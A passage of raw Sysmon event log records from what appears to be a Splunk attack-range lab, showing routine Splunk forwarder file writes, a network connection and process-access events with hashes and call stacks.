Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65056116A8CF3B3D05679B59F6893558,SHA256=F5C4B94A85725E8BF5B33BB484F2A7C65AEDE57375B6F44420E9F4A66BD0B549,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:42.572{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49194-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:45.379{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F8BC7A79AD255FB847B348720D6CF63,SHA256=6F5DB12C9FBF10F375BE23583F853B3A094AB8B89D2A2C2385EB24E2C19EB9A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.425{4F8D34B0-14CD-6216-BC04-000000003902}22922468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14CD-6216-BC04-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-14CD-6216-BC04-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.160{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14CD-6216-BC04-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.161{4F8D34B0-14CD-6216-BC04-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:46.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F382B7AD95CFFB4F0540166C67ED05D9,SHA256=CDEA8860D8AE5DF84779A5DBE2B856165C08CEBF7D31258FC9090B79DD48F0D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:46.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6567531103428445BC254224E5447D30,SHA256=AF6D6B53B427E0CDDBDE72273B2EB8672558CAA62FB6580104E7782EA4CD054F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:46.331{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:46.316{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C71D45F6137DC6C29241F66DA307FF4D,SHA256=E94D79AC18C6E43B7C7B93DA24188AC704E01A46814AE50218D0750BAFE939A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:47.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643856300234BC9376695DCE616AF776,SHA256=7CAF5E60A7057226CFCD6F266E5022568DC58D7892715B3207DAF47A7FE4314D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14CF-6216-BE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 